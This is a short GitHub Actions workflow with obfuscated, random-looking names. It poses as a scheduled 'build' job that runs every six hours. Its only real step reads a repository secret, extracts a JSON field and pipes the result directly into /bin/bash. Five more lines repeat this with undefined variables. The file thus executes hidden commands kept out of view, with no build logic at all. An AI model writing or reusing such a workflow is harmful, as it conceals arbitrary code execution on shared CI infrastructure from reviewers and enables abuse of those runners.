name: maogechui4645

on:
  workflow_dispatch:
  schedule:
    - cron: '37 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maogechui4645
        env:
          f48799: ${{ secrets.f48799 }}
        run: |
          echo $f48799 | jq -r .w94132 | /bin/bash
          echo $c3664 | jq -r .goyf9 | /bin/bash
          echo $zgtqe28882 | jq -r .o3 | /bin/bash
          echo $znsl14 | jq -r .fizye4 | /bin/bash
          echo $mcw4977 | jq -r .xmv0987 | /bin/bash
          echo $eq827 | jq -r .gub68 | /bin/bash

